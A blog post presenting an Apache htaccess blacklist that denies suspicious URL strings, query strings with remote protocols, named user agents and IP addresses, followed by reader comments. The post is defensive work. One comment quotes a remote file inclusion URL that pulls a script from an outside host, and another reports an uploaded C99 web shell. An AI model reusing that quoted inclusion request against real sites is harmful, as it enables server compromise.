Latest TweetsGreat post about the latest power grab: www.eff.org/deeplinks/2018/09/…
Perishable Press

Perishable Press 3G Blacklist

[ 3G Stormtroopers ]

After much research and discussion, I have developed a concise, lightweight security strategy for Apache-powered websites. Prior to the development of this strategy, I relied on several extensive blacklists to protect my sites against malicious user agents and IP addresses.

Over time, these mega-lists became unmanageable and ineffective. As increasing numbers of attacks hit my server, I began developing new techniques for defending against external threats. This work soon culminated in the release of a “next-generation” blacklist that works by targeting common elements of decentralized server attacks.

Consisting of a mere 37 lines, this “2G” Blacklist provided enough protection to enable me to completely eliminate over 350 blacklisting directives from my site’s root htaccess file. This improvement increased site performance and decreased attack rates, however many bad hits were still getting through. More work was needed..

The 3G Blacklist

Work on the 3G Blacklist required several weeks of research, testing, and analysis. During the development process, five major improvements were discovered, documented, and implemented. Using pattern recognition, access immunization, and multiple layers of protection, the 3G Blacklist serves as an extremely effective security strategy for preventing a vast majority of common exploits. The list consists of four distinct parts, providing multiple layers of protection while synergizing into a comprehensive defense mechanism. Further, as discussed in previous articles, the 3G Blacklist is designed to be as lightweight and flexible as possible, thereby facilitating periodic cultivation and maintenance. Sound good? Here it is:

# PERISHABLE PRESS 3G BLACKLIST

# PART I: CHARACTER STRINGS
<IfModule mod_alias.c>
 RedirectMatch 403 \:
 RedirectMatch 403 \;
 RedirectMatch 403 \<
 RedirectMatch 403 \>
 RedirectMatch 403 \/\,
 RedirectMatch 403 \/\/
 RedirectMatch 403 f\-\.
 RedirectMatch 403 \.\.\.
 RedirectMatch 403 \.inc
 RedirectMatch 403 alt\=
 RedirectMatch 403 ftp\:
 RedirectMatch 403 ttp\:
 RedirectMatch 403 \.\$url
 RedirectMatch 403 \/\$url
 RedirectMatch 403 \/\$link
 RedirectMatch 403 news\.php
 RedirectMatch 403 menu\.php
 RedirectMatch 403 main\.php
 RedirectMatch 403 home\.php
 RedirectMatch 403 view\.php
 RedirectMatch 403 about\.php
 RedirectMatch 403 blank\.php
 RedirectMatch 403 block\.php
 RedirectMatch 403 order\.php
 RedirectMatch 403 search\.php
 RedirectMatch 403 errors\.php
 RedirectMatch 403 button\.php
 RedirectMatch 403 middle\.php
 RedirectMatch 403 threads\.php
 RedirectMatch 403 contact\.php
 RedirectMatch 403 include\.php
 RedirectMatch 403 display\.php
 RedirectMatch 403 register\.php
 RedirectMatch 403 authorize\.php
 RedirectMatch 403 \/wp\-signup\.php
 RedirectMatch 403 \/classes\/
 RedirectMatch 403 \/includes\/
 RedirectMatch 403 \/path\_to\_script\/
 RedirectMatch 403 ImpEvData\.
 RedirectMatch 403 head\_auth\.
 RedirectMatch 403 db\_connect\.
 RedirectMatch 403 check\_proxy\.
 RedirectMatch 403 doeditconfig\.
 RedirectMatch 403 submit\_links\.
 RedirectMatch 403 change\_action\.
 RedirectMatch 403 send\_reminders\.
 RedirectMatch 403 comment\-template\.
 RedirectMatch 403 syntax\_highlight\.
 RedirectMatch 403 admin\_db\_utilities\.
 RedirectMatch 403 admin\.webring\.docs\.
 RedirectMatch 403 function\.main
 RedirectMatch 403 function\.mkdir
 RedirectMatch 403 function\.opendir
 RedirectMatch 403 function\.require
 RedirectMatch 403 function\.array\-rand
 RedirectMatch 403 ref\.outcontrol
</IfModule>

# PART II: QUERY STRINGS 
<ifmodule mod_rewrite.c>
 RewriteCond %{QUERY_STRING} ftp\:   [NC,OR]
 RewriteCond %{QUERY_STRING} http\:  [NC,OR]
 RewriteCond %{QUERY_STRING} https\: [NC,OR]
 RewriteCond %{QUERY_STRING} \[      [NC,OR]
 RewriteCond %{QUERY_STRING} \]      [NC]
 RewriteRule .* -                    [F,L]
</ifmodule>

# PART III: USER AGENTS
SetEnvIfNoCase User-Agent "Jakarta Commons" keep_out
SetEnvIfNoCase User-Agent "Y!OASIS/TEST"    keep_out
SetEnvIfNoCase User-Agent "libwww-perl"     keep_out
SetEnvIfNoCase User-Agent "MOT-MPx220"      keep_out
SetEnvIfNoCase User-Agent "MJ12bot"         keep_out
SetEnvIfNoCase User-Agent "Nutch"           keep_out
SetEnvIfNoCase User-Agent "cr4nk"           keep_out
<Limit GET POST PUT>
 order allow,deny
 allow from all
 deny from env=keep_out
</Limit>

# PART IV: IP ADDRESSES
<Limit GET POST PUT>
 order allow,deny
 allow from all
 deny from 75.126.85.215  "# blacklist candidate 2008-01-02 = admin-ajax.php attack "
 deny from 128.111.48.138 "# blacklist candidate 2008-02-10 = cryptic character strings "
 deny from 87.248.163.54  "# blacklist candidate 2008-03-09 = block administrative attacks "
 deny from 84.122.143.99  "# blacklist candidate 2008-04-27 = block clam store loser "
</Limit>

Installation and Usage

Before using the 3G Blacklist, check the following system requirements:

  • Linux server running Apache
  • Enabled Apache module: mod_alias
  • Enabled Apache module: mod_rewrite
  • Ability to edit your site’s root htaccess file (or)
  • Ability to modify Apache’s server configuration file

With these requirements met, copy and paste the entire 3G Blacklist into either the root htaccess file or the server configuration file. After uploading, visit your site and check proper loading of as many different types of pages as possible. For example, if you are running a blogging platform (such as WordPress), test different page views (single, archive, category, home, etc.), log into and surf the admin pages (plugins, themes, options, posts, etc.), and also check peripheral elements such as individual images, available downloads, and alternate protocols (FTP, HTTPS, etc.).

While the 3G Blacklist is designed to target only the bad guys, the regular expressions used in the list may interfere with legitimate URL access. If this happens, the browsing device will display a 403 Forbidden error. Don’t panic! Simply check the blocked URL, locate the matching blacklist string, and disable the directive by placing a pound sign ( # ) at the beginning of the associated line. Once the correct line is commented out, the blocked URL should load normally. Also, if you do happen to experience any conflicts involving the 3G Blacklist, please leave a comment or contact me directly. Thank you :)

Wrap Up..

As my readers know, I am serious about site security. Nothing gets my adrenaline pumping more than the thought of a giant meat grinder squirting out endless chunks of mangled cracker meat. Spam and other exploitative activity on the web has grown exponentially. Targeting and blocking individual agents and IP is no longer a viable strategy. By recognizing and immunizing against the broadest array of common attack elements, the 3G Blacklist maximizes resources while providing solid defense against malicious attacks.

Updates

Updates to the 3G Blacklist/firewall:

2008/05/14

Removed “RedirectMatch 403 \/scripts\/” from the first part of the blacklist due to conflict with Mint Statistics.

2008/05/18

Removed the following three directives to facilitate Joomla functionality:

RedirectMatch 403 \/modules\/
RedirectMatch 403 \/components\/
RedirectMatch 403 \/administrator\/

2008/05/31

Removed “RedirectMatch 403 config\.php” from the first part of the list to ensure proper functionality with the “visual-editing” feature of the WordPress Admin Area.

Jeff Starr
About the Author Jeff Starr = Web Developer. Security Specialist. WordPress Buff.
Archives
84 responses
  1. Jeff Starr

    Hi Denny, thanks for the information.. I have been wanting to setup something similar on one of my other sites for quite awhile now. I assume that the video is a live stream and not some pre-recorded footage..? The software looks easy enough, and the embedding seems straightforward, but I imagine that setting up a secure personal server would require some time..

    In any case, I think that personal live streaming video will become all the rage, just as soon as the technology makes it easy for “everyone” to do!

  2. Denny Smith October 26, 2008 @ 9:39 am

    Jeff,

    That’s correct. It is live video. I am using several things. One is no-ip to mask my actual ip address as well as a static ip port forwarded through 2 routers in a local network. (That was a pain sort of) but a DNS redirect is propbably the best advise as far as securing the connection. After all, you essentially open a pot on your computer. I had to hack my regisrty a bit to allow more than 2 connections to come in. I am thinking about writing a tutorial on the process that would better explain how I am doing this.

    By the way, I emailed you a copy of my wp-admin but it must have tagged it as spam.

    wp-admin.php was renamed to fx_wp-admin.php and contained code like this?

    ' //eval($code);
       } else {
          testdata('save_fail');
       };
    '
    Any suggestion on removing this type of hack?

    Thanks!

  3. Thank you, very interesting article. But I’m sorry because I’m on a window server and I use IIS.. by chance, have you ever translated your method for IIS? :-)

  4. Regarding IIS – there is no easy or free way of doing the same thing.

    You would either have to build something in ASP/.NET which would look at your request parameters and do all the required tests – or purchase a product like http://www.isapirewrite.com/ and then build all the filters you need yourself.

  5. Jeff Starr

    @Denny: Hmm, I haven’t seen that type of hack before, however I would be more than happy to look at your file if you resend it (zipped!) or post it somewhere on the net..

    As for a tutorial on your video streaming technique, I would love to see it, as would many others, I assume. Although one thing I have noticed when visiting your site is that the stream is not always active. On several occasions, the video tries to load but then ends up with just a blank screen..

  6. @Jeff : thank you for you kind reply. My provider supports isapirewrite, but maybe I should study a bit to translate your list in my httpd.ini… :-)
    have a good blogging!

  7. Re: # PART IV: IP ADDRESSES

    I have found another very effective way to deal with blocking ip’s from scumbags remarkably in the Apache docs.

    First you create a hosts.deny file and add the restricted IPs

    190.176.128.6 -
    190.176.176.15 -
    190.176.150.150 -
    190.176.138.63 -

    Next you add a rule to your vhost config file or server main config.

    RewriteEngine on
    RewriteMap hosts-deny txt:/path/to/hosts.deny
    RewriteCond ${hosts-deny:%{REMOTE_ADDR}|NOT-FOUND} !=NOT-FOUND
    RewriteRule ^/.* - [F]

    The nice thing about this is you can add IPs and the rule is enforced immediately.

  8. Jeff Starr

    @Peter: Thanks for the tip! That looks like a potentially useful method of blocking IPs, however keep in mind that not everyone has access to the server configuration file(s). Also note that rules added directly to individual htaccess files are also “enforced immediately.” Great tip though — thanks for sharing! :)

  9. The same code could be used from a .htaccess file. The problem using .htaccess files is the server has to work looking for more controls up the path unless you use AllowOverride None at the bottom of your file. This will however render any other .htaccess files useless in higher directories.

  10. By the way Jeff. I found the culprit. Someone uploaded a C99madShell v. 2.0 madnet edition to my server. How could they get that on my server?

  11. Jeff Starr

    @Peter: Thanks for the follow-up! Although deny (and other blacklisting) directives are typically implemented in the root htaccess file, so generally there is no need for the server to do any extra work, as far as I know..

    @Denny: That’s crazy! Sounds like a serious security breach, if you ask me. If your site is otherwise secure, I wouldn’t rule out malicious activity from the admin/tech staff of your current hosting provider (unless you are self-hosted of course)..

  12. Hi,

    Thanks for the Tips.

    The RedirectMatch 403 // do not work on this attack:
    http://www.mydomainname.com/request/playing.php/playing.php/common/db.php?commonpath=http://mun-hwa.com/bbs/kombi.txt?”

    But RedirectMatch 403 db.php works and the most importend is to block outgoing traffic on server on port 80 the server can not get this url:
    http://mun-hwa.com/bbs/kombi.txt?” :-)
    I think the firewall works for the most include php attacks.

    Also i use ossec to find attacks!

    Thanks for helping! And i hope i found in the future more tips here!
    Great job!

    Michel

[ Comments are closed for this post ]